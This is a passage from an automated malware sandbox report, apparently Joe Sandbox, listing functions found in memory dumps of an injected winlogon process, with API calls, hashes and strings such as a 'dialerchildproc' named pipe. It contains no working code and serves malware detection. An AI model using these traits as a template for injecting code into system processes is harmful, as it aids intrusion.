                                                                  • Instruction ID: 5143fbefe5be0cbdbfcec55bfe3b06ee70d7d12685544569a92137414076662f
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: CF117C7A614B50D2E710CFA9F50875A6760F789BA6F908311EB5A06BE8CF7CC148CB05
                                                                  Function 00000225DC642334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction ID: 9d95a24ee7134dd075f6916613b88123dbf79a1f71578d387e86653e009e63ca
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: 65114F75628B5092E7108FA5F50875A7771F389BA6F608315EB5A02BA8CF7CC144CB00
                                                                  Function 00000225DC677940 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID:
                                                                  • API String ID: 190073905-0
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: 63ad33cb13a1a1ecb4fb3b89351e14cbc887f17384d78b1a824e8bcf136f24cd
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 3A81F52C700F61AAFB52AFED944D3596290AB89B82F14CD259B0487FD6DFB8C945CF00
                                                                  Function 00000225DC647940 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID:
                                                                  • API String ID: 190073905-0
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: 245c3a3780669e612167fd2f49c2b2f1444ffda43349089e810e4d17d475938c
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 1181262C71CF71BAFB90AFED984D3593290AB85B82F14D1A5DA0783796DB38C945CB00
                                                                  Function 00000225DC67A1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A279
                                                                  • GetLastError.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A303
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction ID: 93bdd749a80a6279d82df938997b6772221fc21d9ad4c52bcd094a8c62c4e4d0
                                                                  • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction Fuzzy Hash: CD31C935316E60F1EE11DFC9A4087552394FB04B61F699925AD2E47BD2DF39C545C310
                                                                  Function 00000225DC64A1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A279
                                                                  • GetLastError.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A303
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction ID: 7c354baf2becc406c9690de1d574f0e0c23927cd8675cd5bc7f9ca9363dd24dd
                                                                  • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction Fuzzy Hash: 9831C72931EE60B1EE129BCAA4087553394F708B66F698664EE1F47392EF39C144C300
                                                                  Function 00000225DC6841E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                  • String ID: CONOUT$
                                                                  • API String ID: 3230265001-3130406586
                                                                  • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction ID: dcc30e952b56894f8f882cea4a7a8afdedaba1e3027df95fb4c3850d902d2072
                                                                  • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction Fuzzy Hash: CF119035314F6096E750CBDAF85831966A0FB88BE6F548215EA5E8B7D4CF38C404C745
                                                                  Function 00000225DC6541E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                  • String ID: CONOUT$
                                                                  • API String ID: 3230265001-3130406586
                                                                  • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction ID: 69caf4a79e949a29d135b95860dd2f68db3fa5e2b64677b329da0df6282d1a4f
                                                                  • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction Fuzzy Hash: 6B118F35324F6096E7908BDAF85832966A4F788FE6F248225EA5E87794DF38C804C740
                                                                  Function 00000225DC673BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: b10adc177de773fbabd993369e697b4a55bd2c125b3a7f779076e93c5e5e0882
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction Fuzzy Hash: D9118E6A300B5092EB649BA9E4482696261FB48F95F548838DF8D07B94EF3DC544C708
                                                                  Function 00000225DC675F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction ID: 6a97c4c12a32b94d673c00423403d4c75ff52a93935e058119094c360a29ac69
                                                                  • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction Fuzzy Hash: 6CD1AA7A208F98D5DA70DB9AE49835AB7A0F388B85F104616EACD47BA5DF7CC541CB00
                                                                  Function 00000225DC6731CC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID: dialer
                                                                  • API String ID: 756756679-3528709123
                                                                  • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction ID: 7ade69da3f205b80d6d51427c7ba1e6dfbeddfa96b255973500cefac0ca4292f
                                                                  • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction Fuzzy Hash: 39319F3A705F61A2EB50DFEAE54876963A0BB54F82F18C9348F5807B95EF34D465C300
                                                                  Function 00000225DC6431CC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID: dialer
                                                                  • API String ID: 756756679-3528709123
                                                                  • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction ID: 6f800f5eb6f628bcdb478ea8421835497432b21b4983bca8d0c9fc270d56c7b5
                                                                  • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction Fuzzy Hash: D731702970DF65A2EA54DFEAE94876A7390BB54F81F08C1348F4907B55EF34D465C700
                                                                  Function 00000225DC67D3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D415
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D442
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D453
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D464
                                                                  • SetLastError.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: 81a05c6f5631c5457e9fe2b42ee4983d0892a68f7a2414799b655d9ba0bc122a
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: 91116028305EA4A2FA54A7FDA94D32922526F487F2F14CF24A8360BEDADE38D455C201
                                                                  Function 00000225DC64D3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D415
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D442
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D453
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D464
                                                                  • SetLastError.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: d7c3e1b3af68b237c83f6f8dcef22936f5b3b66116359f701a570614066f6f87
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: 20115E2870DEA4A2FA54A7FEA55D32931526F447F2F14C3A4A93747BD6DE389441C201
                                                                  Function 00000225DC671934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID:
                                                                  • API String ID: 517849248-0
                                                                  • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction ID: ff90e378864f0c6d412857972eafb711c87b153c10ed2fd60762ccb5c830d762
                                                                  • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction Fuzzy Hash: 46016D29304F5092EB20DB9AA55835963A1FB88FC2F888135DF8D47794DE3CC58AC740
                                                                  Function 00000225DC641934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID:
                                                                  • API String ID: 517849248-0
                                                                  • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction ID: 8503e0577ac3cef940353d0619d113767c251b8243f17370ba59280a411ad442
                                                                  • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction Fuzzy Hash: 7B016929318E5092EB50DB9AA85835A63A1F788FC2F588134DF8E43758DF3CC989C740
                                                                  Function 00000225DC673B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
